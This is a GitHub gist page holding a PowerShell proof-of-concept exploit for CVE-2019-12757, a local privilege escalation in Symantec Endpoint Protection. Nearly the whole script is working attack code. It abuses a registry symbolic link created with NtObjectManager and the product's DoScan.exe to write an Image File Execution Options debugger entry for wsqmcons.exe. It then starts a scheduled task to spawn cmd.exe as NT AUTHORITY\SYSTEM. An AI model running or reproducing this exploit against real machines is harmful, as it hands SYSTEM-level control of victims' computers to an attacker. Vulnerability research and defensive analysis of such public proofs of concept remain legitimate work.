Skip to content

Instantly share code, notes, and snippets.

@enigma0x3

enigma0x3/SEPLPE.ps1 Secret

Created Nov 14, 2019
Embed
What would you like to do?
CVE-2019-12757
Write-Host "[*] Installing NTObjectManager..." -ForeGroundColor "Green"
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Checking for Tamper Protection" -ForeGroundColor "Green"
$Result = Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Storages\SymProtect\RealTimeScan" -Name Disabled
if($Result.Disabled -eq "1")
{
$User = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
$SID = $User.Value
Write-Host "[*] User's SID is: $SID" -ForeGroundColor "Green"
Write-Host "[*] Removing registry key..." -ForeGroundColor "Green"
Remove-Item "HKLM:\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID" -Recurse -Force
Write-Host "[*] Creating Symbolic link to IFEO on wsqmcons.exe" -ForeGroundColor "Green"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Scheduler\$SID",$null, "\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe")
Write-Host "[*] Symbolic Link Created, triggering vulnerability..." -ForeGroundColor "Green"
New-Item -Path "c:\" -Name "exploit" -ItemType "directory"
Start-Process "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\DoScan.exe" -ArgumentList "/ScanDir C:\exploit"
Write-Host "[*] Sleeping 10 seconds" -ForeGroundColor "Green"
Start-Sleep "10"
Write-Host "[*] Adding debugger key to on IFEO of wsqmcons.exe..." -ForeGroundColor "Green"
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe" -Name "Debugger" -PropertyType "String" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
Write-Host "[*] Starting the Consolidator Task..." -ForeGroundColor "Green"
Get-ScheduledTask "Consolidator" | Start-ScheduledTask
Write-Host "Done, cmd.exe should be running as NT AUTHORITY\SYSTEM" -ForeGroundColor "Green"
} else{
Write-Host "[!] Tamper protection on, exiting" -ForeGroundColor "Red"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.